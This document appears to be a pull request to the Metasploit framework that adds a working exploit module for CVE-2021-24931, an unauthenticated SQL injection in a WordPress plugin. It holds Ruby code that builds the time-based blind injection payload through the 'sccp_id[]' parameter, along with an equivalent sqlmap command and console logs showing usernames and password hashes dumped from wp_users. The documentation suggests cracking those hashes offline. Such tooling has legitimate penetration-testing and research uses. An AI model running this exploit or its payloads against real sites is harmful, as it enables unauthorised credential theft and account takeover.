### PR TITLE
wordpress Secure Copy Content Protection and Content Locking Unauthenticated sqli (CVE-2021-24931)

### DIFF
--- a/data/wordlists/wp-exploitable-plugins.txt
+++ b/data/wordlists/wp-exploitable-plugins.txt
@@ -36,6 +36,7 @@ dukapress
 loginizer
 email-subscribers
 wps-hide-login
+secure-copy-content-protection
 wordpress-mobile-pack
 learnpress
 wp-mobile-edition
@@ -48,4 +49,5 @@ simple-backup
 subscribe-to-comments
 easy-wp-smtp
 duplicator_download
+custom-registration-form-builder-with-submission-manager
 woocommerce-abandoned-cart

--- a/documentation/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.md
@@ -75,3 +75,54 @@ wp_users
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
 ```
+
+### Secure Copy Content Protection and Content Locking 2.8.1 on WordPress 5.9.1 on Docker
+```
+msf6 payload(windows/x64/meterpreter/reverse_tcp) > use auxiliary/scanner/http/wp_secure_copy_content_protection_sqli
+msf6 auxiliary(scanner/http/wp_secure_copy_content_protection_sqli) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/wp_secure_copy_content_protection_sqli) > set RPORT 8000
+RPORT => 8000
+msf6 auxiliary(scanner/http/wp_secure_copy_content_protection_sqli) > show options
+
+Module options (auxiliary/scanner/http/wp_secure_copy_content_protection_sqli):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metas
+                                          ploit
+   RPORT       8000             yes       The target port (TCP)
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI   /                yes       The base path to the wordpress application
+   THREADS     1                yes       The number of concurrent threads (max one per host)
+   USER_COUNT  3                yes       Number of user credentials to enumerate
+   VHOST                        no        HTTP server virtual host
+
+
+Auxiliary action:
+
+   Name        Description
+   ----        -----------
+   List Users  Queries username, password hash for USER_COUNT users
+
+
+msf6 auxiliary(scanner/http/wp_secure_copy_content_protection_sqli) > run
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Enumerating Usernames and Password Hashes
+[!] Each user will take about 5-10 minutes to enumerate. Be patient.
+[+] Dumped table contents:
+wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ normal      $P$Bu9/XNK93oyUTKO.zJ9yGZfYAcbZg9.
+ testAdmin   $P$BYWtZOfh8yqLCKA877hwBysqGdRtk/.
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/wp_secure_copy_content_protection_sqli) >
+```

--- a/documentation/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.md
@@ -1,0 +1,72 @@
+## Vulnerable Application
+
+Secure Copy Content Protection and Content Locking, a WordPress plugin,
+prior to 2.8.2 is affected by an unauthenticated SQL injection via the
+`sccp_id[]` parameter.
+
+The plugin can be downloaded
+[here](https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip)
+
+This module slightly replicates sqlmap running as:
+
+```
+sqlmap --dbms=mysql -u "http://1.1.1.1/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" --technique T -T wp_users -C user_login,user_pass --dump
+```
+
+## Verification Steps
+
+1. Install the plugin, use defaults
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/wp_secure_copy_content_protection_sqli`
+4. Do: `set rhosts [ip]`
+5. Do: `run`
+6. You should get the users and hashes returned.
+
+## Options
+
+### ACTION: List Users
+
+This action lists `COUNT` users and password hashes.
+
+### COUNT
+
+If action `List Users` is selected (default), this is the number of users to enumerate.
+The larger this list, the more time it will take.  Defaults to `3`.
+
+## Scenarios
+
+### Secure Copy Content Protection and Content Locking 2.8.1 on Wordpress 5.7.5 on Ubuntu 20.04
+
+```
+resource (secure_copy.rb)> use auxiliary/scanner/http/wp_secure_copy_content_protection_sqli
+resource (secure_copy.rb)> set rhosts 1.1.1.1
+rhosts => 1.1.1.1
+resource (secure_copy.rb)> set verbose true
+verbose => true
+resource (secure_copy.rb)> set limit 1
+limit => 1
+resource (secure_copy.rb)> run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking /wp-content/plugins/secure-copy-content-protection/readme.txt
+[*] Checking /wp-content/plugins/secure-copy-content-protection/Readme.txt
+[*] Checking /wp-content/plugins/secure-copy-content-protection/README.txt
+[*] Found version 2.8.1 in the plugin
+[+] Vulnerable version of Secure Copy Content Protection and Content Locking detected
+[+] The target appears to be vulnerable.
+[*] Enumerating Usernames and Password Hashes
+[*] {SQLi} Executing (select group_concat(dwOr) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) dwOr from wp_users limit 3) fOXVNQ)
+[*] {SQLi} Encoded to (select group_concat(dwOr) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x16,0)),ifnull(user_pass,repeat(0xa1,0))) as binary) dwOr from wp_users limit 3) fOXVNQ)
+[*] {SQLi} Time-based injection: expecting output of length 124
+[+] Dumped table contents:
+wp_users
+========
+
+ user_login  user_pass
+ ----------  ---------
+ admin       $P$BZlPX7NIx8MYpXokBW2AGsN7i.aUOt0
+ admin2      $P$BNS2BGBTJmjIgV0nZWxAZtRfq1l19p1
+ editor      $P$BdWSGpy/tzJomNCh30a67oJuBEcW0K/
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```

--- a/documentation/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.md
+++ b/documentation/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.md
@@ -4,10 +4,15 @@ Secure Copy Content Protection and Content Locking, a WordPress plugin,
 prior to 2.8.2 is affected by an unauthenticated SQL injection via the
 `sccp_id[]` parameter.
 
-The plugin can be downloaded
+Remote attackers can exploit this vulnerability to dump usernames and password hashes
+from the`wp_users` table of the affected WordPress installation. These password hashes
+can then be cracked offline using tools such as Hashcat to obtain valid login
+credentials for the affected WordPress installation.
+
+A vulnerable version (2.8.1) of the plugin can be downloaded
 [here](https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip)
 
-This module slightly replicates sqlmap running as:
+The output from running this module will be somewhat similar to the following `sqlmap` command:
 
 ```
 sqlmap --dbms=mysql -u "http://1.1.1.1/wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" --technique T -T wp_users -C user_login,user_pass --dump
@@ -19,19 +24,20 @@ sqlmap --dbms=mysql -u "http://1.1.1.1/wp-admin/admin-ajax.php?action=ays_sccp_r
 2. Start msfconsole
 3. Do: `use auxiliary/scanner/http/wp_secure_copy_content_protection_sqli`
 4. Do: `set rhosts [ip]`
+5. Optionally set `USER_COUNT` to the number of users you want to dump the credentials of.
 5. Do: `run`
-6. You should get the users and hashes returned.
-
+6. *Verify* that `USER_COUNT` number of users's usernames and password hashes are gathered from the `wp_users` table of the target WordPress installation.
 ## Options
 
 ### ACTION: List Users
 
-This action lists `COUNT` users and password hashes.
+This action exploits the unauthenticated SQL injection and lists `USER_COUNT`
+users and password hashes from the `wp_users` table of the affected WordPress installation.
 
-### COUNT
+### USER_COUNT
 
-If action `List Users` is selected (default), this is the number of users to enumerate.
-The larger this list, the more time it will take.  Defaults to `3`.
+If action `List Users` is selected (default), this is the number of users to enumerate the credentials of.
+The larger this number, the more time it will take for the module to run.  Defaults to `3`.
 
 ## Scenarios
 
@@ -51,7 +57,6 @@ resource (secure_copy.rb)> run
 [*] Checking /wp-content/plugins/secure-copy-content-protection/Readme.txt
 [*] Checking /wp-content/plugins/secure-copy-content-protection/README.txt
 [*] Found version 2.8.1 in the plugin
-[+] Vulnerable version of Secure Copy Content Protection and Content Locking detected
 [+] The target appears to be vulnerable.
 [*] Enumerating Usernames and Password Hashes
 [*] {SQLi} Executing (select group_concat(dwOr) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) dwOr from wp_users limit 3) fOXVNQ)

--- a/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.rb
+++ b/modules/auxiliary/scanner/http/wp_secure_copy_content_protection_sqli.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::SQLi
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  require 'metasploit/framework/hashes/identify'
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress Secure Copy Content Protection and Content Locking sccp_id Unauthenticated SQLi',
+        'Description' => %q{
+          Secure Copy Content Protection and Content Locking, a WordPress plugin,
+          prior to 2.8.2 is affected by an unauthenticated SQL injection via the
+          'sccp_id[]' parameter.
+        },
+        'Author' => [
+          'h00die', # msf module
+          'Hacker5preme (Ron Jost)', # edb
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2021-24931'],
+          ['URL', 'https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md'],
+          ['EDB', '50733'],
+          ['WPVDB', '1cd52d61-af75-43ed-9b99-b46c471c4231'],
+        ],
+        'Actions' => [
+          ['List Users', { 'Description' => 'Queries username, password hash for COUNT users' }]
+        ],
+        'DefaultAction' => 'List Users',
+        'DisclosureDate' => '2021-11-08',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        }
+      )
+    )
+    register_options [
+      OptInt.new('COUNT', [false, 'Number of users to enumerate', 3])
+    ]
+  end
+
+  def check_host(_ip)
+    unless wordpress_and_online?
+      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
+    end
+
+    checkcode = check_plugin_version_from_readme('secure-copy-content-protection', '2.8.2')
+    if checkcode == Msf::Exploit::CheckCode::Safe
+      return Msf::Exploit::CheckCode::Safe('Secure Copy Content Protection and Content Locking version not vulnerable')
+    end
+
+    print_good('Vulnerable version of Secure Copy Content Protection and Content Locking detected')
+    checkcode
+  end
+
+  def run_host(ip)
+    id = Rex::Text.rand_text_numeric(1)
+    @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind, opts: { hex_encode_strings: true }) do |payload|
+      res = send_request_cgi({
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
+        'vars_get' => {
+          'action' => 'ays_sccp_results_export_file',
+          'sccp_id[]' => "#{id}) AND (SELECT #{Rex::Text.rand_text_numeric(4)} FROM (SELECT(#{payload}))#{Rex::Text.rand_text_alpha(4)})-- #{Rex::Text.rand_text_alpha(4)}",
+          'type' => 'json'
+        }
+      })
+      fail_with Failure::Unreachable, 'Connection failed' unless res
+    end
+
+    unless @sqli.test_vulnerable
+      print_bad("#{peer} - Testing of SQLi failed.  If this is time based, try increasing SqliDelay.")
+      return
+    end
+    columns = ['user_login', 'user_pass']
+
+    print_status('Enumerating Usernames and Password Hashes')
+    data = @sqli.dump_table_fields('wp_users', columns, '', datastore['COUNT'])
+
+    table = Rex::Text::Table.new('Header' => 'wp_users', 'Indent' => 1, 'Columns' => columns)
+    data.each do |user|
+      create_credential({
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'Wordpress',
+        address: ip,
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      })
+      table << user
+    end
+    print_good('Dumped table contents:')
+    print_line(table.to_s)
+  end
+end


### PR DESCRIPTION
This adds a very simple to install and exploit (unauth) sqli for wordpress plugin Secure Copy Content Protection and Content Locking <2.8.2.

- [x] Install the plugin, use defaults
- [x] Start msfconsole
- [x] Do: `use auxiliary/scanner/http/wp_secure_copy_content_protection_sqli`
- [x] Do: `set rhosts [ip]`
- [x] Optionally set `USER_COUNT` to the number of users you want to dump the credentials of.
- [x] Do: `run`
- [x] *Verify* that `USER_COUNT` number of users's usernames and password hashes are gathered from the `wp_users` table of the target WordPress installation.
- [x] *Verify* that setting `USER_COUNT` to a number higher than the number of users in the `wp_users` table doesn't cause errors.